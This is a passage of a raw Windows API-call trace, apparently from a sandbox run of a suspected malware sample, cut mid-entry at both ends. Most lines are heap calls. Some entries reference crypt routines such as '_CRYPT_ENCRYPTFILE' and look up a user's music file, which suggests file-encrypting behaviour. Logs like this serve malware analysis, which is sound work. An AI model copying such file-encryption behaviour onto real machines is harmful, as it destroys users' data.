dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.143] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0116.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0116.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0116.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0116.144] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0116.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0116.144] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0116.153] CloseHandle (hObject=0x298) returned 1 [0116.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0116.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0116.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0116.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0116.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0116.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0116.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0116.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0116.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0116.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0116.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0116.159] FreeLibrary (hLibModule=0x772d0000) returned 1 [0116.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0116.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0116.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0116.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0116.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0116.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0116.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0116.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0116.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0116.181] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0116.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0116.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0116.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0116.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0116.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0116.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0116.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0116.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0116.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0116.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0116.187] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0116.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0116.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0116.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0116.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0116.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0116.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0116.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0116.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0116.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0116.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0116.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0116.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0116.196] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0116.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0116.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0116.197] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0116.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0116.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0116.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0116.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0116.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0116.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0116.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0116.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0116.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0116.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0116.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0116.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0116.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0116.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0116.210] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7a58 [0116.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0116.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0116.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0116.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0116.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0116.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0116.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0116.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0116.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0116.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0116.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0116.216] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0116.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0116.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0116.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0116.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0116.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0116.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0116.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0116.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0116.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0116.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0116.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.219] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f501380, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xab2dfb80, ftLastAccessTime.dwHighDateTime=0x1d5ef2a, ftLastWriteTime.dwLowDateTime=0xab2dfb80, ftLastWriteTime.dwHighDateTime=0x1d5ef2a, nFileSizeHigh=0x0, nFileSizeLow=0x17256, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="HkFnDV.mp3", cAlternateFileName="")) returned 0x41ac540 [0116.219] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0116.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0116.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0116.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0116.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0116.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0116.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0116.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.220] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0116.221] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0116.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0116.221] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0116.221] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0116.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0116.221] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: 